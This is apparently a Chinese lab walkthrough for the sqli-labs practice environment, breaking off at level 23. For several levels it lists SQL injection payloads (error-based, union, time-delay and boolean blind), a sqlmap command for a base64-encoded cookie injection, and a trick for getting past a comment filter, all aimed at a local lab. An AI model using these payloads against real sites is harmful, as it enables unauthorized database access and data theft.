sqli-labs通关小结

附上工具：

phpstudy2016：链接：http://pan.baidu.com/s/1bpbEBCj 密码：fmr4

sqli-labs-master：链接：http://pan.baidu.com/s/1jH4WlMY 密码：11mj

环境搭建之前写过，这里就不多说了，直接开始通关体验

1、http://127.0.0.1/sqli-labs-master/Less-1/?id=1 单引号型

　报错型注入payload：

　　1‘ and 1=extractvalue(1,concat(0x7e,(select database())))--+

　Union联合查询型注入payload：

　　0‘ union select 1,database(),3--+

　时间延迟型注入payload：

　　1%27%20and%20sleep(5)--+

　布尔型盲注payload：

　　1‘ and 1=1 --+

　　1‘ and 1=2 --+

2、http://127.0.0.1/sqli-labs-master/Less-2/?id=1

　　0%20union%20select%201,database(),3%20--+

21、cookie型注入

抓包，修改请求包内容

将内容copy到C:\Users\qiupan\Desktop\26.txt中，sqlmap中执行命令：

python.exe sqlmap.py -r C:\Users\qiupan\Desktop\26.txt --cookie "uname=YWRtaW4%3D" --technique E --dbms mysql --tamper "base64encode.py" --batch

22、过滤了注释符

使用and ‘1‘=‘1来闭合引号即可

23、